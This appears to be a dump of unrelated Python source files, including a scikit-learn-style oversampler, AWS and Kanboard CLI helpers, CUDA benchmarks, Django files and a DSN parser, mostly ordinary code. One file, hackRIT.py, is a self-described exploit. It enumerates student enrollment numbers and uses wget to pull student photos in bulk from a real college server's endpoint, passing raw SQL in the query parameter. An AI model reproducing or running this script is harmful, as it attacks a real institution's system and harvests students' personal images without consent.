eQ_reaction = self.get_eQ_reaction_from_rid(r_id, pickaxe, db_name)
if not eQ_reaction:
return None
self.CC.p_h = p_h
self.CC.p_mg = p_mg
self.CC.ionic_strength = ionic_strength
dG_prime = self.CC.dg_prime(eQ_reaction)
self._reset_CC()
return dG_prime
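# A minimal end-to-end sketch (hypothetical names; assumes a Pickaxe run
# `pk` and a pre-built sqlite compound cache already exist):
#
# thermo = Thermodynamics()
# thermo.load_mongo("localhost:27017")
# thermo.load_thermo_from_sqlite("compounds.sqlite")
# dgm = thermo.physiological_dg_prime_from_rid("R1", pickaxe=pk)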
|
Yadnyawalkya/hackRIT
|
hackRIT.py
|
import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale (yadnyawalkyatale@gmail.com) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrical Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #Special Arrangement for Mechanical ;)
else:
pendflag = year_choice + class_choice + 15 + 150000 #For all other branches
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
|
thedemz/python-gems
|
bitten.py
|
import codecs
unicode_string = "Hello Python 3 String"
bytes_object = b"Hello Python 3 Bytes"
print(unicode_string, type(unicode_string))
print(bytes_object, type(bytes_object))
#decode to unicode_string
ux = str(object=bytes_object, encoding="utf-8", errors="strict")
print(ux, type(ux))
ux = bytes_object.decode(encoding="utf-8", errors="strict")
print(ux, type(ux))
hex_bytes = codecs.encode(b"Binary Object", "hex_codec")
def string_to_bytes( text ):
return bin(int.from_bytes(text.encode(), 'big'))
def bytes_to_string( btext ):
#btext = int('0b110100001100101011011000110110001101111', 2)
return btext.to_bytes((btext.bit_length() + 7) // 8, 'big').decode()
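# A round-trip sketch for the two helpers above (assumes the '0b...' binary
# string is converted back to an int first):
# >>> bytes_to_string(int(string_to_bytes("hello"), 2))
# 'hello'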
def char_to_bytes(char):
return bin(ord(char))
def encodes(text):
bext = text.encode(encoding="utf-8")
enc_bext = codecs.encode(bext, "hex_codec")
return enc_bext.decode("utf-8")
def decodes(text):
# a minimal completion (assumed): the inverse of encodes()
bext = codecs.decode(text.encode("utf-8"), "hex_codec")
return bext.decode("utf-8")
if __name__ == "__main__":
print( encodes("walla") )
|
scikit-learn-contrib/imbalanced-learn
|
imblearn/over_sampling/_random_over_sampler.py
|
"""Class to perform random over-sampling."""
# Authors: Guillaume Lemaitre <g.lemaitre58@gmail.com>
# Christos Aridas
# License: MIT
from collections.abc import Mapping
from numbers import Real
import numpy as np
from scipy import sparse
from sklearn.utils import check_array, check_random_state
from sklearn.utils import _safe_indexing
from sklearn.utils.sparsefuncs import mean_variance_axis
from .base import BaseOverSampler
from ..utils import check_target_type
from ..utils import Substitution
from ..utils._docstring import _random_state_docstring
from ..utils._validation import _deprecate_positional_args
@Substitution(
sampling_strategy=BaseOverSampler._sampling_strategy_docstring,
random_state=_random_state_docstring,
)
class RandomOverSampler(BaseOverSampler):
"""Class to perform random over-sampling.
Object to over-sample the minority class(es) by picking samples at random
with replacement. The bootstrap can be generated in a smoothed manner.
Read more in the :ref:`User Guide <random_over_sampler>`.
Parameters
----------
{sampling_strategy}
{random_state}
shrinkage : float or dict, default=None
Parameter controlling the shrinkage applied to the covariance matrix
when a smoothed bootstrap is generated. The options are:
- if `None`, a normal bootstrap will be generated without perturbation.
It is equivalent to `shrinkage=0` as well;
- if a `float` is given, the shrinkage factor will be used for all
classes to generate the smoothed bootstrap;
- if a `dict` is given, the shrinkage factor will be specific for each
class. The key corresponds to the targeted class and the value is
the shrinkage factor.
The value of the shrinkage parameter needs to be higher than or equal
to 0.
.. versionadded:: 0.8
Attributes
----------
sampling_strategy_ : dict
Dictionary containing the information to sample the dataset. The keys
correspond to the class labels from which to sample and the values
are the number of samples to sample.
sample_indices_ : ndarray of shape (n_new_samples,)
Indices of the samples selected.
.. versionadded:: 0.4
shrinkage_ : dict or None
The per-class shrinkage factor used to generate the smoothed bootstrap
sample. When `shrinkage=None` a normal bootstrap will be generated.
.. versionadded:: 0.8
n_features_in_ : int
Number of features in the input dataset.
.. versionadded:: 0.9
See Also
--------
BorderlineSMOTE : Over-sample using the borderline-SMOTE variant.
SMOTE : Over-sample using SMOTE.
SMOTENC : Over-sample using SMOTE for continuous and categorical features.
SMOTEN : Over-sample using the SMOTE variant specifically for categorical
features only.
SVMSMOTE : Over-sample using SVM-SMOTE variant.
ADASYN : Over-sample using ADASYN.
KMeansSMOTE : Over-sample applying a clustering before to oversample using
SMOTE.
Notes
-----
Supports multi-class resampling by sampling each class independently.
Supports heterogeneous data as object array containing string and numeric
data.
When generating a smoothed bootstrap, this method is also known as Random
Over-Sampling Examples (ROSE) [1]_.
.. warning::
Since smoothed bootstraps are generated by adding a small perturbation
to the drawn samples, this method is not adequate when working with
sparse matrices.
References
----------
.. [1] G Menardi, N. Torelli, "Training and assessing classification
rules with imbalanced data," Data Mining and Knowledge
Discovery, 28(1), pp.92-122, 2014.
Examples
--------
>>> from collections import Counter
>>> from sklearn.datasets import make_classification
>>> from imblearn.over_sampling import \
RandomOverSampler # doctest: +NORMALIZE_WHITESPACE
>>> X, y = make_classification(n_classes=2, class_sep=2,
... weights=[0.1, 0.9], n_informative=3, n_redundant=1, flip_y=0,
... n_features=20, n_clusters_per_class=1, n_samples=1000, random_state=10)
>>> print('Original dataset shape %s' % Counter(y))
Original dataset shape Counter({{1: 900, 0: 100}})
>>> ros = RandomOverSampler(random_state=42)
>>> X_res, y_res = ros.fit_resample(X, y)
>>> print('Resampled dataset shape %s' % Counter(y_res))
Resampled dataset shape Counter({{0: 900, 1: 900}})
"""
@_deprecate_positional_args
def __init__(
self,
*,
sampling_strategy="auto",
random_state=None,
shrinkage=None,
):
super().__init__(sampling_strategy=sampling_strategy)
self.random_state = random_state
self.shrinkage = shrinkage
def _check_X_y(self, X, y):
y, binarize_y = check_target_type(y, indicate_one_vs_all=True)
X, y = self._validate_data(
X,
y,
reset=True,
accept_sparse=["csr", "csc"],
dtype=None,
force_all_finite=False,
)
return X, y, binarize_y
def _fit_resample(self, X, y):
random_state = check_random_state(self.random_state)
if isinstance(self.shrinkage, Real):
self.shrinkage_ = {
klass: self.shrinkage for klass in self.sampling_strategy_
}
elif self.shrinkage is None or isinstance(self.shrinkage, Mapping):
self.shrinkage_ = self.shrinkage
else:
raise ValueError(
f"`shrinkage` should either be a positive floating number or "
f"a dictionary mapping a class to a positive floating number. "
f"Got {repr(self.shrinkage)} instead."
)
if self.shrinkage_ is not None:
missing_shrinkage_keys = (
self.sampling_strategy_.keys() - self.shrinkage_.keys()
)
if missing_shrinkage_keys:
raise ValueError(
f"`shrinkage` should contain a shrinkage factor for "
f"each class that will be resampled. The missing "
f"classes are: {repr(missing_shrinkage_keys)}"
)
for klass, shrink_factor in self.shrinkage_.items():
if shrink_factor < 0:
raise ValueError(
f"The shrinkage factor needs to be >= 0. "
f"Got {shrink_factor} for class {klass}."
)
# smoothed bootstrap imposes to make numerical operation; we need
# to be sure to have only numerical data in X
try:
X = check_array(X, accept_sparse=["csr", "csc"], dtype="numeric")
except ValueError as exc:
raise ValueError(
"When shrinkage is not None, X needs to contain only "
"numerical data to later generate a smoothed bootstrap "
"sample."
) from exc
X_resampled = [X.copy()]
y_resampled = [y.copy()]
sample_indices = range(X.shape[0])
for class_sample, num_samples in self.sampling_strategy_.items():
target_class_indices = np.flatnonzero(y == class_sample)
bootstrap_indices = random_state.choice(
target_class_indices,
size=num_samples,
replace=True,
)
sample_indices = np.append(sample_indices, bootstrap_indices)
if self.shrinkage_ is not None:
# generate a smoothed bootstrap with a perturbation
n_samples, n_features = X.shape
smoothing_constant = (4 / ((n_features + 2) * n_samples)) ** (
1 / (n_features + 4)
)
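# This is Silverman's rule-of-thumb bandwidth for a multivariate Gaussian
# kernel, (4 / ((d + 2) * n)) ** (1 / (d + 4)) with d features and n samples;
# the per-class shrinkage factor then scales it below.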
if sparse.issparse(X):
_, X_class_variance = mean_variance_axis(
X[target_class_indices, :],
axis=0,
)
X_class_scale = np.sqrt(X_class_variance, out=X_class_variance)
else:
X_class_scale = np.std(X[target_class_indices, :], axis=0)
smoothing_matrix = np.diagflat(
self.shrinkage_[class_sample] * smoothing_constant * X_class_scale
)
X_new = random_state.randn(num_samples, n_features)
X_new = X_new.dot(smoothing_matrix) + X[bootstrap_indices, :]
if sparse.issparse(X):
X_new = sparse.csr_matrix(X_new, dtype=X.dtype)
X_resampled.append(X_new)
else:
# generate a bootstrap
X_resampled.append(_safe_indexing(X, bootstrap_indices))
y_resampled.append(_safe_indexing(y, bootstrap_indices))
self.sample_indices_ = np.array(sample_indices)
if sparse.issparse(X):
X_resampled = sparse.vstack(X_resampled, format=X.format)
else:
X_resampled = np.vstack(X_resampled)
y_resampled = np.hstack(y_resampled)
return X_resampled, y_resampled
def _more_tags(self):
return {
"X_types": ["2darray", "string", "sparse", "dataframe"],
"sample_indices": True,
"allow_nan": True,
}
|
phatblat/AbletonLiveMIDIRemoteScripts
|
Push2/session_recording.py
|
# Source Generated with Decompyle++
# File: session_recording.pyc (Python 2.5)
from __future__ import absolute_import
from pushbase.session_recording_component import FixedLengthSessionRecordingComponent
class SessionRecordingComponent(FixedLengthSessionRecordingComponent):
def __init__(self, *a, **k):
super(SessionRecordingComponent, self).__init__(*a, **k)
self.set_trigger_recording_on_release(not (self._record_button.is_pressed))
def set_trigger_recording_on_release(self, trigger_recording):
self._should_trigger_recording = trigger_recording
def _on_record_button_pressed(self):
pass
def _on_record_button_released(self):
if self._should_trigger_recording:
self._trigger_recording()
self._should_trigger_recording = True
|
victor-o-silva/db_file_storage
|
demo_and_tests/model_filefields_example/migrations/0002_auto_20180826_0054.py
|
# Generated by Django 2.1 on 2018-08-26 00:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('model_filefields_example', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='book',
name='cover',
field=models.ImageField(blank=True, null=True, upload_to='model_filefields_example.BookCover/bytes/filename/mimetype'),
),
migrations.AlterField(
model_name='book',
name='index',
field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.BookIndex/bytes/filename/mimetype'),
),
migrations.AlterField(
model_name='book',
name='pages',
field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.BookPages/bytes/filename/mimetype'),
),
migrations.AlterField(
model_name='sounddevice',
name='instruction_manual',
field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.SoundDeviceInstructionManual/bytes/filename/mimetype'),
),
]
|
jhazelwo/python-awscli
|
python2awscli/model/securitygroup.py
|
""" -*- coding: utf-8 -*- """
from python2awscli import bin_aws
from python2awscli.error import AWSNotFound, ParseError, AWSDuplicate
from python2awscli import must
class BaseSecurityGroup(object):
def __init__(self, name, region, vpc, description, inbound=None, outbound=None):
"""
:param name: String, name of SG
:param region: String, AWS region
:param vpc: String, IP of the VPC this SG belongs to
:param description: String
:param inbound: List of dicts, IP Permissions that should exist
:param outbound: List of dicts, IP Permissions that should exist
"""
self.id = None
self.name = name
self.region = region
self.vpc = vpc
self.description = description
self.IpPermissions = []
self.IpPermissionsEgress = []
self.owner = None
self.changed = False
try:
self._get()
except AWSNotFound:
self._create()
self._merge_rules(must.be_list(inbound), self.IpPermissions)
self._merge_rules(must.be_list(outbound), self.IpPermissionsEgress, egress=True)
if self.changed:
self._get()
def _break_out(self, existing):
"""
Undo AWS's rule flattening so we can do simple 'if rule in existing' logic later.
:param existing: List of SG rules as dicts.
:return: List of SG rules as dicts.
"""
spool = list()
for rule in existing:
for ip in rule['IpRanges']:
copy_of_rule = rule.copy()
copy_of_rule['IpRanges'] = [ip]
copy_of_rule['UserIdGroupPairs'] = []
spool.append(copy_of_rule)
for group in rule['UserIdGroupPairs']:
copy_of_rule = rule.copy()
copy_of_rule['IpRanges'] = []
copy_of_rule['UserIdGroupPairs'] = [group]
spool.append(copy_of_rule)
return spool
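# A sketch of the un-flattening with illustrative values: one AWS rule such as
#   {'IpProtocol': 'tcp', 'FromPort': 22, 'ToPort': 22,
#    'IpRanges': [{'CidrIp': '10.0.0.0/8'}, {'CidrIp': '172.16.0.0/12'}],
#    'UserIdGroupPairs': []}
# becomes two single-source rules, so the `rule in existing` checks in
# _merge_rules stay simple.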
def _merge_rules(self, requested, active, egress=False):
"""
:param requested: List of dicts, IP Permissions that should exist
:param active: List of dicts, IP Permissions that already exist
:param egress: Bool, addressing outbound rules or not?
:return: Bool
"""
if not isinstance(requested, list):
raise ParseError(
'SecurityGroup {0}, need a list of dicts, instead got "{1}"'.format(self.name, requested))
for rule in requested:
if rule not in active:
self._add_rule(rule, egress)
for active_rule in active:
if active_rule not in requested:
self._rm_rule(active_rule, egress)
return True
def _add_rule(self, ip_permissions, egress):
"""
:param ip_permissions: Dict of IP Permissions
:param egress: Bool
:return: Bool
"""
direction = 'authorize-security-group-ingress'
if egress:
direction = 'authorize-security-group-egress'
command = ['ec2', direction,
'--region', self.region,
'--group-id', self.id,
'--ip-permissions', str(ip_permissions).replace("'", '"')
]
bin_aws(command)
print('Authorized: {0}'.format(ip_permissions)) # TODO: Log(...)
self.changed = True
return True
def _rm_rule(self, ip_permissions, egress):
"""
:param ip_permissions: Dict of IP Permissions
:param egress: Bool
:return: Bool
"""
direction = 'revoke-security-group-ingress'
if egress:
direction = 'revoke-security-group-egress'
command = ['ec2', direction,
'--region', self.region,
'--group-id', self.id,
'--ip-permissions', str(ip_permissions).replace("'", '"')
]
bin_aws(command)
print('Revoked: {0}'.format(ip_permissions)) # TODO: Log(...)
self.changed = True
return True
def _create(self):
"""
Create a Security Group
:return:
"""
# AWS grants all new SGs this default outbound rule ("pro-human & anti-machine behavior").
default_egress = {
'Ipv6Ranges': [],
'PrefixListIds': [],
'IpRanges': [{'CidrIp': '0.0.0.0/0'}],
'UserIdGroupPairs': [], 'IpProtocol': '-1'
}
command = [
'ec2', 'create-security-group',
'--region', self.region,
'--group-name', self.name,
'--description', self.description,
'--vpc-id', self.vpc
]
try:
self.id = bin_aws(command, key='GroupId')
except AWSDuplicate:
return False # OK if it already exists.
print('Created {0}'.format(command)) # TODO: Log(...)
self.IpPermissions = []
self.IpPermissionsEgress = [default_egress]
self.changed = True
return True
def _get(self):
"""
Get information about Security Group from AWS and update self
:return: Bool
"""
command = ['ec2', 'describe-security-groups', '--region', self.region, '--group-names', self.name]
result = bin_aws(command, key='SecurityGroups', max=1) # will raise NotFound if empty
me = result[0]
self.id = me['GroupId']
self.owner = me['OwnerId']
self.IpPermissions = self._break_out(me['IpPermissions'])
self.IpPermissionsEgress = self._break_out(me['IpPermissionsEgress'])
print('Got {0}'.format(command)) # TODO: Log(...)
return True
def _delete(self):
"""
Delete myself by my own id.
As of 20170114 no other methods call me. You must do `foo._delete()`
:return:
"""
command = ['ec2', 'delete-security-group', '--region', self.region,
# '--dry-run',
'--group-id', self.id
]
bin_aws(command, decode_output=False)
print('Deleted {0}'.format(command)) # TODO: Log(...)
return True
|
kanboard/kanboard-cli
|
kanboard_cli/shell.py
|
# The MIT License (MIT)
#
# Copyright (c) 2016 Frederic Guillot
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from cliff import app
from cliff import commandmanager
from pbr import version as app_version
import sys
from kanboard_cli.commands import application
from kanboard_cli.commands import project
from kanboard_cli.commands import task
from kanboard_cli import client
class KanboardShell(app.App):
def __init__(self):
super(KanboardShell, self).__init__(
description='Kanboard Command Line Client',
version=app_version.VersionInfo('kanboard_cli').version_string(),
command_manager=commandmanager.CommandManager('kanboard.cli'),
deferred_help=True)
self.client = None
self.is_super_user = True
def build_option_parser(self, description, version, argparse_kwargs=None):
parser = super(KanboardShell, self).build_option_parser(
description, version, argparse_kwargs=argparse_kwargs)
parser.add_argument(
'--url',
metavar='<api url>',
help='Kanboard API URL',
)
parser.add_argument(
'--username',
metavar='<api username>',
help='API username',
)
parser.add_argument(
'--password',
metavar='<api password>',
help='API password/token',
)
parser.add_argument(
'--auth-header',
metavar='<authentication header>',
help='API authentication header',
)
return parser
def initialize_app(self, argv):
client_manager = client.ClientManager(self.options)
self.client = client_manager.get_client()
self.is_super_user = client_manager.is_super_user()
self.command_manager.add_command('app version', application.ShowVersion)
self.command_manager.add_command('app timezone', application.ShowTimezone)
self.command_manager.add_command('project show', project.ShowProject)
self.command_manager.add_command('project list', project.ListProjects)
self.command_manager.add_command('task create', task.CreateTask)
self.command_manager.add_command('task list', task.ListTasks)
def main(argv=sys.argv[1:]):
return KanboardShell().run(argv)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
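# Example invocation (illustrative; the console-script name below is an
# assumption -- any entry point that calls main() behaves the same):
#   kanboard --url https://kanboard.example.com/jsonrpc.php \
#            --username admin --password secret project list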
|
operepo/ope
|
laptop_credential/winsys/tests/test_fs/test_fs.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os, sys
import tempfile
from winsys._compat import unittest
import uuid
import win32file
from winsys.tests.test_fs import utils
from winsys import fs
class TestFS (unittest.TestCase):
filenames = ["%d" % i for i in range (5)]
def setUp (self):
utils.mktemp ()
for filename in self.filenames:
with open (os.path.join (utils.TEST_ROOT, filename), "w"):
pass
def tearDown (self):
utils.rmtemp ()
def test_glob (self):
import glob
pattern = os.path.join (utils.TEST_ROOT, "*")
        self.assertEqual (list (fs.glob (pattern)), glob.glob (pattern))
def test_listdir (self):
import os
fs_version = list (fs.listdir (utils.TEST_ROOT))
os_version = os.listdir (utils.TEST_ROOT)
        self.assertEqual (fs_version, os_version, "%s differs from %s" % (fs_version, os_version))
#
# All the other module-level functions are hand-offs
# to the corresponding Entry methods.
#
if __name__ == "__main__":
unittest.main ()
if sys.stdout.isatty (): raw_input ("Press enter...")
|
fierval/KaggleMalware
|
Learning/1dlbp_tests.py
|
import numpy as np
import matplotlib.pylab as plt
from numba import cuda, uint8, int32, uint32, jit
from timeit import default_timer as timer
@cuda.jit('void(uint8[:], int32, int32[:], int32[:])')
def lbp_kernel(input, neighborhood, powers, h):
i = cuda.grid(1)
r = 0
if i < input.shape[0] - 2 * neighborhood:
i += neighborhood
for j in range(i - neighborhood, i):
if input[j] >= input[i]:
r += powers[j - i + neighborhood]
for j in range(i + 1, i + neighborhood + 1):
if input[j] >= input[i]:
r += powers[j - i + neighborhood - 1]
cuda.atomic.add(h, r, 1)
def extract_1dlbp_gpu(input, neighborhood, d_powers):
maxThread = 512
blockDim = maxThread
d_input = cuda.to_device(input)
hist = np.zeros(2 ** (2 * neighborhood), dtype='int32')
gridDim = (len(input) - 2 * neighborhood + blockDim) / blockDim
d_hist = cuda.to_device(hist)
lbp_kernel[gridDim, blockDim](d_input, neighborhood, d_powers, d_hist)
d_hist.to_host()
return hist
def extract_1dlbp_gpu_debug(input, neighborhood, powers, res):
maxThread = 512
blockDim = maxThread
gridDim = (len(input) - 2 * neighborhood + blockDim) / blockDim
for block in range(0, gridDim):
for thread in range(0, blockDim):
r = 0
i = blockDim * block + thread
if i < input.shape[0] - 2 * neighborhood:
i += neighborhood
for j in range(i - neighborhood, i):
if input[j] >= input[i]:
r += powers[j - i + neighborhood]
for j in range(i + 1, i + neighborhood + 1):
if input[j] >= input[i]:
r += powers[j - i + neighborhood - 1]
res[r] += 1
return res
@jit("int32[:](uint8[:], int64, int32[:], int32[:])", nopython=True)
def extract_1dlbp_cpu_jit(input, neighborhood, powers, res):
maxThread = 512
blockDim = maxThread
gridDim = (len(input) - 2 * neighborhood + blockDim) / blockDim
for block in range(0, gridDim):
for thread in range(0, blockDim):
r = 0
i = blockDim * block + thread
if i < input.shape[0] - 2 * neighborhood:
i += neighborhood
for j in range(i - neighborhood, i):
if input[j] >= input[i]:
r += powers[j - i + neighborhood]
for j in range(i + 1, i + neighborhood + 1):
if input[j] >= input[i]:
r += powers[j - i + neighborhood - 1]
res[r] += 1
return res
def extract_1dlbp_cpu(input, neighborhood, p):
"""
Extract the 1d lbp pattern on CPU
"""
res = np.zeros(1 << (2 * neighborhood))
for i in range(neighborhood, len(input) - neighborhood):
left = input[i - neighborhood : i]
right = input[i + 1 : i + neighborhood + 1]
both = np.r_[left, right]
res[np.sum(p [both >= input[i]])] += 1
return res
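# Worked example (added for clarity): with neighborhood = 1 and
# input = [5, 3, 7], the only interior pixel is input[1] = 3. Its left
# neighbour 5 >= 3 contributes p[0] = 1 and its right neighbour 7 >= 3
# contributes p[1] = 2, so the pattern is 3 and res[3] is incremented.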
X = np.arange(3, 7)
X = 10 ** X
neighborhood = 4
cpu_times = np.zeros(X.shape[0])
cpu_times_simple = cpu_times.copy()
cpu_times_jit = cpu_times.copy()
gpu_times = np.zeros(X.shape[0])
p = 1 << np.array(range(0, 2 * neighborhood), dtype='int32')
d_powers = cuda.to_device(p)
for i, x in enumerate(X):
input = np.random.randint(0, 256, size = x).astype(np.uint8)
print "Length: {0}".format(x)
print "--------------"
start = timer()
h_cpu = extract_1dlbp_cpu(input, neighborhood, p)
cpu_times[i] = timer() - start
print "Finished on CPU: time: {0:3.5f}s".format(cpu_times[i])
res = np.zeros(1 << (2 * neighborhood), dtype='int32')
start = timer()
h_cpu_simple = extract_1dlbp_gpu_debug(input, neighborhood, p, res)
cpu_times_simple[i] = timer() - start
print "Finished on CPU (simple): time: {0:3.5f}s".format(cpu_times_simple[i])
res = np.zeros(1 << (2 * neighborhood), dtype='int32')
start = timer()
h_cpu_jit = extract_1dlbp_cpu_jit(input, neighborhood, p, res)
cpu_times_jit[i] = timer() - start
print "Finished on CPU (numba: jit): time: {0:3.5f}s".format(cpu_times_jit[i])
start = timer()
h_gpu = extract_1dlbp_gpu(input, neighborhood, d_powers)
gpu_times[i] = timer() - start
print "Finished on GPU: time: {0:3.5f}s".format(gpu_times[i])
print "All h_cpu == h_gpu: ", (h_cpu_jit == h_gpu).all() and (h_cpu_simple == h_cpu_jit).all() and (h_cpu == h_cpu_jit).all()
print ''
f = plt.figure(figsize=(10, 5))
plt.plot(X, cpu_times, label = "CPU")
plt.plot(X, cpu_times_simple, label = "CPU non-vectorized")
plt.plot(X, cpu_times_jit, label = "CPU jit")
plt.plot(X, gpu_times, label = "GPU")
plt.yscale('log')
plt.xscale('log')
plt.xlabel('input length')
plt.ylabel('time, sec')
plt.legend()
plt.show()
|
hhalmeida/corponovo
|
manage.py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "corponovo.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
jiasir/openstack-trove
|
lib/charmhelpers/contrib/openstack/ip.py
|
from charmhelpers.core.hookenv import (
config,
unit_get,
)
from charmhelpers.contrib.network.ip import (
get_address_in_network,
is_address_in_network,
is_ipv6,
get_ipv6_addr,
)
from charmhelpers.contrib.hahelpers.cluster import is_clustered
PUBLIC = 'public'
INTERNAL = 'int'
ADMIN = 'admin'
_address_map = {
PUBLIC: {
'config': 'os-public-network',
'fallback': 'public-address'
},
INTERNAL: {
'config': 'os-internal-network',
'fallback': 'private-address'
},
ADMIN: {
'config': 'os-admin-network',
'fallback': 'private-address'
}
}
def canonical_url(configs, endpoint_type=PUBLIC):
'''
Returns the correct HTTP URL to this host given the state of HTTPS
configuration, hacluster and charm configuration.
:configs OSTemplateRenderer: A config tempating object to inspect for
a complete https context.
:endpoint_type str: The endpoint type to resolve.
:returns str: Base URL for services on the current service unit.
'''
scheme = 'http'
if 'https' in configs.complete_contexts():
scheme = 'https'
address = resolve_address(endpoint_type)
if is_ipv6(address):
address = "[{}]".format(address)
return '%s://%s' % (scheme, address)
def resolve_address(endpoint_type=PUBLIC):
resolved_address = None
if is_clustered():
if config(_address_map[endpoint_type]['config']) is None:
# Assume vip is simple and pass back directly
resolved_address = config('vip')
else:
for vip in config('vip').split():
if is_address_in_network(
config(_address_map[endpoint_type]['config']),
vip):
resolved_address = vip
else:
if config('prefer-ipv6'):
fallback_addr = get_ipv6_addr()
else:
fallback_addr = unit_get(_address_map[endpoint_type]['fallback'])
resolved_address = get_address_in_network(
config(_address_map[endpoint_type]['config']), fallback_addr)
if resolved_address is None:
raise ValueError('Unable to resolve a suitable IP address'
' based on charm state and configuration')
else:
return resolved_address
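# Illustrative examples (added): with an 'https' context and an IPv6 unit
# address, canonical_url() returns something like 'https://[2001:db8::1]';
# with plain http and IPv4 it returns e.g. 'http://10.0.0.5'.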
|
mylokin/servy
|
servy/utils/dsntool.py
|
import collections
import re
import urlparse
class DSN(collections.MutableMapping):
''' Hold the results of a parsed dsn.
This is very similar to urlparse.ParseResult tuple.
http://docs.python.org/2/library/urlparse.html#results-of-urlparse-and-urlsplit
It exposes the following attributes:
scheme
schemes -- if your scheme has +'s in it, then this will contain a list of schemes split by +
path
paths -- the path segment split by /, so "/foo/bar" would be ["foo", "bar"]
host -- same as hostname (I just like host better)
hostname
hostloc -- host:port
username
password
netloc
query -- a dict of the query string
query_str -- the raw query string
port
fragment
'''
DSN_REGEXP = re.compile(r'^\S+://\S+')
FIELDS = ('scheme', 'netloc', 'path', 'params', 'query', 'fragment')
def __init__(self, dsn, **defaults):
''' Parse a dsn to parts similar to urlparse.
        This is a nuts-and-bolts function that can serve as a good basis for parsing a custom dsn
:param dsn: the dsn to parse
:type dsn: str
:param defaults: any values you want to have defaults for if they aren't in the dsn
:type defaults: dict
'''
assert self.DSN_REGEXP.match(dsn), \
"{} is invalid, only full dsn urls (scheme://host...) allowed".format(dsn)
first_colon = dsn.find(':')
scheme = dsn[0:first_colon]
dsn_url = dsn[first_colon+1:]
url = urlparse.urlparse(dsn_url)
options = {}
if url.query:
for k, kv in urlparse.parse_qs(url.query, True, True).iteritems():
if len(kv) > 1:
options[k] = kv
else:
options[k] = kv[0]
self.scheme = scheme
self.hostname = url.hostname
self.path = url.path
self.params = url.params
self.query = options
self.fragment = url.fragment
self.username = url.username
self.password = url.password
self.port = url.port
self.query_str = url.query
for k, v in defaults.iteritems():
self.set_default(k, v)
def __iter__(self):
for f in self.FIELDS:
yield getattr(self, f, '')
    def __len__(self):
        return len(self.FIELDS)
def __getitem__(self, field):
return getattr(self, field, None)
def __setitem__(self, field, value):
setattr(self, field, value)
def __delitem__(self, field):
